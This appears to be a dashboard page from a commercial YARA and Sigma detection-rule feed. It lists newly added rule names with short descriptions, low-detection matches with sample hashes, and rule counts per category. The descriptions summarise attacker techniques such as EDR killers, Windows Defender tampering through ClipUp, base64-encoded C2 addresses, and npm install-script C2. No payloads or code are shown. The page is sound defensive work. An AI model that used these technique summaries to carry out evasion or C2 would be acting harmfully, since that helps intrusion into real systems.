currently serving 23609 YARA rules and 4421 Sigma rules
API Key
New Rules per Day
Newest YARA Rules
This table shows the newest additions to the YARA rule set
Rule
Description
Date
Ref
SUSP_WIN_SchTask_QEMU_Port_Fwd_Indicators_Feb26
Detects suspicious scheduled task XML files with QEMU port forwarding indicators, which could be used for malicious purposes such as setting up reverse tunnels or C2 communication channels
09.02.2026
SUSP_B64_Encoded_AppDomainManager_Config_Feb26
Detects Base64 encoded .NET application configuration files used to instantiate the AppDomainManager class
09.02.2026
SUSP_B64_Encoded_AppDomainManager_CS_Feb26
Detects Base64 encoded C# code overwriting the AppDomainManager
09.02.2026
SUSP_NPM_SupplyChain_Attack_C2_Feb26
Detects pre- and postinstall scripts in combination with cloud services frequently abused as C2s
09.02.2026
SUSP_NPM_Device_Fingerprinting_Feb26
Detects suspicious device fingerprinting functionality
09.02.2026
SUSP_NPM_Terminal_Output_Persistence_Feb26
Detects suspicious terminal output persistence to bypass NPM buffering
09.02.2026
HKTL_Unknown_C2_Stager_Feb26
Detects unknown C2 stager
07.02.2026
HKTL_KillEDR_Feb26_1
Detects unknown EDR killer tools
07.02.2026
HKTL_SharpEDRChecker_Feb26_1
Detects Sharp EDR Checker - a tool that checks for the presence of known defensive products such as AV and EDRs
07.02.2026
HKTL_Novel_EDR_Evasion_Feb26
Detects unknown EDR killer tools
07.02.2026
HKTL_KillEDR_Feb26_2
Detects unknown EDR killer tools
07.02.2026
HKTL_KillEDR_Feb26_3
Detects unknown EDR killer tools
07.02.2026
MAL_NET_RedKitten_SloppyMio_Feb26
Detects .NET based rat implant observed to be used by Iranian threat actors. The implant exploits the legitimate AppVStreamingUX to sideload itsself.
06.02.2026
SUSP_KALI_IMAGE_Feb26
Detects Kali Linux images or installation media. This might be used to perform attacks from virtual machines.
05.02.2026
SUSP_AntiRootkit_Keywords_Feb26
Detects suspicious keywords related to debugger and anti rootkit. This may be used to evade detection.
05.02.2026
MAL_DKnife_Gateway_Monitoring_Framework_Feb26
Detects the DKnife gateway monitoring framework.
05.02.2026
MAL_Dknife_VPN_Client_HA_PROXY_Feb26
Detects customized N2N (a P2P) VPN client component used by DKnife to contact to C2 (remote.bin), reverse proxy server module modified from HAProxy (sslmm.bin), labelling and relay component (postapi.bin), bridged TAP interface (yitiji.bin) and dkupdate (dkupdate)
05.02.2026
SUSP_Base64_Encoded_IP_Feb26
Detects suspicious HTTP requests with base64 encoded IP addresses, which could indicate a potential hard-coded obfuscated IP address in a script or binary that could be used for e.g. C&C communication.
04.02.2026
MAL_MACOS_Phishing_Dropper_Feb26
Detects Apple Disk Image containing a malicious dropper script for executing further payloads. Actors often use phishing lures to make the victim unknowingly execute the arbitrary code.
03.02.2026
MAL_POC_Microsoft_Warbird_Loader_Feb26
Detects a POC to turn Microsoft Warbird into a shellcode loader
03.02.2026
MAL_LNX_Stealth_Persistence_Framework_Feb26
Detects the Stealth Persistence Framework on Linux systems, which is used for maintaining unauthorized access.
02.02.2026
MAL_Chrysalis_DllLoader_Feb26
Detects DLL used to load Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom
02.02.2026
MAL_Chrysalis_Shellcode_Loader_Feb26
Detects shellcode used to load Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom
02.02.2026
MAL_Chrysalis_Backdoor_Feb26
Detects Chrysalis backdoor, seen being used in the compromise of the infrastructure hosting Notepad++ by Chinese APT group Lotus Blossom
02.02.2026
Successful YARA Rules in Set
This table shows statistics of the best rules with lowest AV detection rates (rules created in the last 12 months, matches of the last 14 days)
Rule
Average AV Detection Rate
Sample Count
Info
VT
Latest YARA Matches with Low AV Detection Rate
This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)
Rule
AVs
Hash
VT
SUSP_OBFUSC_Base64_Hex_Encoded_Apr19
8
62e1d86212cf8d494c8ea9da79318408de06dfdb6ea5bda95f48a95f74e9ef74
SUSP_OBFUSC_Base64_Hex_Encoded_Apr19
14
dbe77120a7efa8306632da669d2c4e1092cc8ebde0c17f7f25152c341fd2de6a
HKTL_Ladpdomaindump_Bloodhound_Feb19
1
a20584f679227feb8f8c3b9414ed92a45ba7cb9e1d761ad769c0d3aeb81e141e
SUSP_PS1_Encoded_Nested_Commands_Jun25
1
83349c6487e28f0e5e73b160dc71b8ca97388f22806f6dbb0562aa5297090928
HKTL_PS1_Villain_C2_Implant_Apr23_1
11
6502d6dc7442d493674056dc7c13391c54ac1fdf62b5d5befa3752c7bc0bcd64
SUSP_LNX_RevShell_Payloads_Jun21_1
11
6502d6dc7442d493674056dc7c13391c54ac1fdf62b5d5befa3752c7bc0bcd64
SUSP_PS1_Small_NetworkFunc_Jun22_1
11
6502d6dc7442d493674056dc7c13391c54ac1fdf62b5d5befa3752c7bc0bcd64
HKTL_Disable_Tamper_Protection_Jul24
6
baeb4bebd830cdddf47946a0e2a200f94b52bf226d90f71ebe5e6feb8d767abc
SUSP_MSIL_NET_ConfuserEx_Module_Encryption_Sep23
2
60d32559b89f2e66d2b125fbccf157175c49ba8fec906e5d7965f6ef77fc2d5d
SUSP_OBFUSC_Base64_Hex_Encoded_Apr19
8
4fde193ad03c6ea2659743a704b72ec3cadeb59ba59aabcbee45d666602b7eec
SUSP_PyInstaller_Gen_Pattern_Feb25
7
a61efc946e96c6f073a33ff92f51c41e9699c0a07bf07fcff6e26eb7c45d3fbb
YARA Rules Per Category
This list shows the number of YARA rules in the subscribable categories (categories overlap as a rule can be in 'n' categories)
Tag
Count
Malware
7438
Threat Hunting (not subscribable, only in THOR scanner)
5777
APT
5043
Hacktools
4809
Webshells
2397
Exploits
713
Newest Sigma Rules
This table shows the newest additions to the Sigma rule set
Rule
Description
Date
Ref
Info
File Operation via .NET Class
Detects the use of dotnet method in command lines which could be used for unauthorized file operations such as copying files.
It could indicate suspicious activity because there are many normal ways to copy files in Windows, thus adversary may use this rarely used method to avoid detection.
06.02.2026
Suspicious Linux Command Patterns
Detects suspicious command line patterns that may indicate malicious activity such as decoding base64 content to files in some folder and executing it.
05.02.2026
Suspicious Download and Execution Combo in Linux
Detect suspicious command line patterns where a download command line utility is executed in combination with other suspicious command line utilities.
This could indicate potential malicious activity such as downloading and various other actions like decoding, changing permissions, or executing the downloaded file or creating persistence.
05.02.2026
Suspicious Double Extension File Execution on Linux
Detects suspicious use of executable extensions like .sh, .py or .pl after a non-executable file extension to disguise malicious files in Linux environments
05.02.2026
Suspicious Double Extension Files in Linux
Detects files with double extensions in Linux systems, which could be an attempt to disguise executable content as harmless documents.
05.02.2026
Suspicious Base64 Encoded IP in PowerShell Execution
Detects PowerShell script blocks that contain base64-encoded IP addresses, a technique commonly used for obfuscation and defense evasion.
Threat actors may leverage this method to download and execute secondary payloads from IP addresses - often their command and control (C2) servers or other malicious infrastructure.
By encoding these URLs in base64 within PowerShell commands, adversaries attempt to bypass detection mechanisms and evade user scrutiny.
This rule helps identify suspicious activity where PowerShell is used to retrieve content from IPs via base64-encoded strings, which is rarely seen in legitimate software.
04.02.2026
Suspicious Base64 Encoded IP in Command Line
Detects processes with command lines containing base64-encoded IP addresses, which may indicate obfuscation or evasion attempts.
Threat actors often host their secondary malicious payloads on IP addresses, potentially their C&C servers or other hosting infrastructure.
To download these malicious payloads, the malware dropper technique involves downloading and executing a secondary payload from an IP address.
And to obscure the command line from normal user scrutiny, threat actors may their script or command line arguments in base64 encoding to download and execute the secondary payload.
04.02.2026
Renamed TinyCC (TCC) Compiler Execution
Detects the execution of a renamed TinyCC (TCC) Compiler (tcc.exe)
Attackers have been observed renaming tcc.exe to masquerade as legitimate Windows binaries (e.g., svchost.exe) to compile and execute malicious C code in memory, such as shellcode loaders.
This technique was observed in Chrysalis backdoor attacks.
03.02.2026
Suspicious Child Process of Notepad++ Updater - GUP.Exe
Detects suspicious child process creation by the Notepad++ updater process (gup.exe).
This could indicate potential exploitation of the updater component to deliver unwanted malware.
03.02.2026
Uncommon File Created by Notepad++ Updater Gup.EXE
Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations.
This could indicate potential exploitation of the updater component to deliver unwanted malware or unwarranted files.
03.02.2026
Tiny C Compiler Runtime Execution
Detects execution of Tiny C Compiler (TCC) which compiles and executes C code directly in memory.
This technique was observed in Chrysalis backdoor campaigns where attackers renamed tcc.exe to svchost.exe and used it
to load shellcode from .c files directly into memory, bypassing traditional detection methods.
03.02.2026
Notepad++ Updater DNS Query to Uncommon Domains
Detects when the Notepad++ updater (gup.exe) makes DNS queries to domains that are not part of the known legitimate update infrastructure.
This could indicate potential exploitation of the updater mechanism or suspicious network activity that warrants further investigation.
02.02.2026
CLSID DefaultIcon Value Tampering
Detects potential COM object hijacking. Adversaries have used CLSID DefaultIcon to reference malicious payload, encrypted payloads, or conceal payload execution paths as part of defense-evasion and persistence chains.
31.01.2026
Suspicious PowerShell Execution with Public IPv4
Detects PowerShell making web requests directly to public IPv4 addresses using Invoke-WebRequest or Invoke-RestMethod, which may indicate suspicious activity.
Threat actors may use this technique to download and execute secondary payloads from direct IP addresses, potentially their command and control (C2) servers or other malicious infrastructure.
29.01.2026
Win32_ScheduledJob Class or At.exe Enabled - Registry
Detects the enabling of the Win32_ScheduledJob WMI class or At.exe via registry modification.
The Win32_ScheduledJob class is used to create and manage scheduled jobs in Windows.
This class is disabled by default for security reasons, and enabling it may indicate an attempt to create or manage scheduled jobs in a potentially malicious manner.
29.01.2026
Suspicious Modification of Service ImagePath for ClipUp Defender Evasion
Detects registry modifications that set the ImagePath of a service to execute ClipUp.exe with Protected Process Light (PPL) parameters targeting Windows Defender locations.
This technique is used by attackers to replace the Windows Defender service executable before it initializes, effectively bypassing security protections.
The approach leverages CreateProcessAsPPL.exe to obtain PPL privileges, which normally protect security software from tampering.
29.01.2026
Suspicious File Creation by Clipup in Windows Defender Directory
Detects file creation by Clipup.exe in the Windows Defender program files directory.
ClipUp.exe may be used to overwrite the service executable of Windows Defender, potentially allowing an attacker to disable or manipulate Windows Defender.
29.01.2026
Suspicious PowerShell Execution with Public IPv4 - PowerShell
Detects PowerShell commands or scripts making web requests directly to public IPv4 addresses using `Invoke-WebRequest` or `Invoke-RestMethod`, which may indicate suspicious activity.
Threat actors may use this technique to download and execute secondary payloads from direct IP addresses, potentially their command and control (C2) servers or other malicious infrastructure.
29.01.2026
Win32_ScheduledJob Class or At.exe Enabled - Process
Detects the enabling of the Win32_ScheduledJob WMI class or At.exe via registry modification.
The Win32_ScheduledJob class is used to create and manage scheduled jobs in Windows.
This class is disabled by default for security reasons, and enabling it may indicate an attempt to create or manage scheduled jobs in a potentially malicious manner.
29.01.2026
Windows Defender Critical Binary Deletion
Detects the deletion of critical Windows Defender binaries which could indicate an attempt to disable or manipulate Windows Defender.
29.01.2026
Suspicious ClipUp Execution with Windows Defender Path
Detects suspicious execution of ClipUp.exe with parameters that may indicate an attempt to write to Windows Defender protected locations.
ClipUp.exe may be used to overwrite the service executable of Windows Defender, potentially allowing an attacker to disable or manipulate Windows Defender.
29.01.2026
Windows Defender Folder Invocation Through Short Name
Detects suspicious command line patterns where a process is invoking a path within the Windows Defender folder using its short name (8.3 notation).
This technique may be used to execute or manipulate Windows Defender binaries while evading detection mechanisms that do not account for short path names.
29.01.2026
Suspicious Driver Service Installation
Detects attempts to install a suspicious driver service using the 'sc.exe' command.
It has been observed that adversaries use this technique to install malicious/vulnerable drivers to bypass/disrupt security solutions such as EDRs.
This technique is often used in conjunction with other techniques to establish persistence and maintain control over the compromised system.
27.01.2026
Potentially Suspicious Usage of Win32 ScheduledJob WMI Class
Detects potential abuse of the Win32_ScheduledJob WMI class for creating or removing scheduled jobs.
This WMI class, which is disabled by default for security reasons, manages AT.exe command-based scheduled jobs.
Threat actors can exploit this class to execute malicious code at predetermined times or remove job to evade detection.
The use of this WMI class instead of conventional scheduling methods may indicate suspicious activity.
27.01.2026
Driver Service Configuration Changed to Kernel Mode
Detects attempts to modify driver's service configurations to kernel mode using the 'sc config' command.
An attacker can use sc.exe to change the privileges for a driver, enabling it to run in kernel mode, which is
typically performed by attackers in order to gain deeper system control to disable security services such as antivirus protection.
27.01.2026
Suspicious Driver Service Installation - Security
Detects installations of driver services from unusual directories that may indicate malicious activity.
Adversaries often deploy rogue or compromised drivers to evade security measures (like EDR/AV), obtain kernel-level access, or extract sensitive data like LSASS memory.
This approach has become increasingly prevalent among ransomware operators and malicious actors.
27.01.2026
Suspicious Driver Service Installation - System
Detects driver service installations from suspicious locations, indicating potential malware activity.
Threat actors may install malicious/vulnerable drivers for various purposes, such as to bypass security products (EDR/AV) or gain kernel access to dump lsass etc.
This technique is very commonly used in security product bypass attempts and is nowadays commonly used by ransomware groups/threat actors.
27.01.2026
Potentially Suspicious PyInstaller Executable
Detects execution of potentially suspicious PyInstaller executables that have been packaged with python code which may include malicious payloads.
PyInstaller is a popular tool for packaging Python applications into standalone executables, but it can also be used by adversaries to wrap and obfuscate malicious python code into a single executable file.
27.01.2026
Velociraptor Abuse via Suspicious PowerShell Commands
Detects Velociraptor.exe being abused to execute suspicious PowerShell or command-line activity indicative of post-exploitation behavior.
27.01.2026
YARA/SIGMA Rule Count
Rule Type
Community Feed
Nextron Private Feed
Yara
2720
20889
Sigma
3540
881
Sigma Rules Per Category (Community)
Type
Count
windows / process_creation
1331
windows / registry_set
219
windows / file_event
206
windows / ps_script
165
windows / security
160
linux / process_creation
131
windows / image_load
114
webserver
82
windows / system
74
macos / process_creation
68
aws / cloudtrail
55
proxy
54
windows / network_connection
53
linux / auditd
53
azure / activitylogs
42
windows / registry_event
40
azure / auditlogs
38
windows / ps_module
33
windows / application
31
windows / dns_query
27
windows / process_access
25
azure / signinlogs
24
okta / okta
22
azure / riskdetection
19
windows / pipe_created
18
opencanary / application
18
rpc_firewall / application
17
windows / windefend
16
github / audit
16
linux
16
gcp / gcp.audit
16
bitbucket / audit
14
linux / file_event
13
m365 / threat_management
13
windows / file_delete
13
cisco / aaa
12
windows / create_remote_thread
12
windows / codeintegrity-operational
10
windows / driver_load
10
windows / registry_delete
10
kubernetes / application / audit
10
windows / ps_classic_start
9
dns
9
windows / create_stream_hash
9
windows / appxdeployment-server
9
windows / firewall-as
8
windows / msexchange-management
8
gcp / google_workspace.admin
7
antivirus
7
fortigate / event
7
windows / file_access
7
azure / pim
7
windows / bits-client
7
zeek / smb_files
7
windows / dns-client
6
zeek / dns
5
linux / network_connection
5
zeek / http
5
jvm / application
5
kubernetes / audit
5
windows / sysmon
4
windows / taskscheduler
4
windows / iis-configuration
4
zeek / dce_rpc
4
m365 / audit
3
macos / file_event
3
windows / wmi_event
3
windows / powershell-classic
3
windows / ntlm
3
windows / registry_add
3
linux / sshd
3
windows / dns-server
2
apache
2
spring / application
2
onelogin / onelogin.events
2
firewall
2
linux / syslog
2
windows / security-mitigations
2
nodejs / application
1
windows / microsoft-servicebus-client
1
python / application
1
windows / diagnosis-scripted
1
windows / file_executable_detected
1
windows / sysmon_error
1
m365 / threat_detection
1
zeek / rdp
1
windows / smbclient-security
1
windows / file_rename
1
windows / sysmon_status
1
ruby_on_rails / application
1
m365 / exchange
1
zeek / kerberos
1
windows / terminalservices-localsessionmanager
1
sql / application
1
windows / driver-framework
1
windows
1
cisco / duo
1
linux / sudo
1
velocity / application
1
cisco / ldp
1
nginx
1
windows / dns-server-analytic
1
cisco / bgp
1
windows / ldap
1
windows / wmi
1
windows / printservice-admin
1
windows / lsa-server
1
windows / ps_classic_provider_start
1
windows / printservice-operational
1
database
1
linux / guacamole
1
windows / appmodel-runtime
1
django / application
1
linux / auth
1
linux / clamav
1
fortios / sslvpnd
1
juniper / bgp
1
windows / applocker
1
windows / openssh
1
cisco / syslog
1
linux / cron
1
huawei / bgp
1
windows / appxpackaging-om
1
windows / smbclient-connectivity
1
windows / smbserver-connectivity
1
windows / process_tampering
1
paloalto / file_event / globalprotect
1
linux / vsftpd
1
zeek / x509
1
windows / capi2
1
windows / shell-core
1
windows / file_change
1
windows / raw_access_thread
1
paloalto / appliance / globalprotect
1
windows / certificateservicesclient-lifecycle-system
1
Sigma Rules Per Category (Nextron Private Feed)
Type
Count
windows / process_creation
414
windows / ps_script
81
windows / registry_set
80
windows / file_event
45
windows / image_load
45
linux / process_creation
41
windows / wmi
29
windows / security
25
proxy
12
windows / system
10
windows / registry_event
8
windows / network_connection
8
windows / kernel-event-tracing
6
windows / ntfs
5
windows / ps_module
5
windows / registry_delete
4
windows / create_remote_thread
4
windows / pipe_created
4
windows / sense
4
windows / taskscheduler
4
windows / hyper-v-worker
3
windows / driver_load
3
windows / ps_classic_script
3
windows / vhd
3
webserver
3
windows / application-experience
3
windows / bits-client
2
windows / dns_query
2
windows / codeintegrity-operational
2
windows / file_delete
2
linux / file_event
2
windows / kernel-shimengine
2
windows / file_access
2
macos / process_creation
2
windows / windefend
2
windows / process_access
2
windows / process-creation
2
windows / firewall-as
1
windows / registry-setinformation
1
windows / application
1
windows / file_rename
1
windows / audit-cve
1
dns
1
windows / amsi
1
Tenable Nessus
Requirement: Privileged Scan
- YARA Scanning with Nessus works only when scanning with credentials (privileged scan)
YARA Scanning with Nessus
- You can only upload a single .yar file
- Filesystem scan has to be activated
- You have to define the target locations
- The Nessus plugin ID will be 91990
- Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls, .xls
Carbon Black
Tutorial: https://github.com/carbonblack/cb-yara-connectorFireEye EX
Tutorial: https://www.fireeye.com/blog/products-and-services/2018/12/detect-and-block-email-threats-with-custom-yara-rules.html
Scan your endpoints, forensic images or collected files with our portable scanner THOR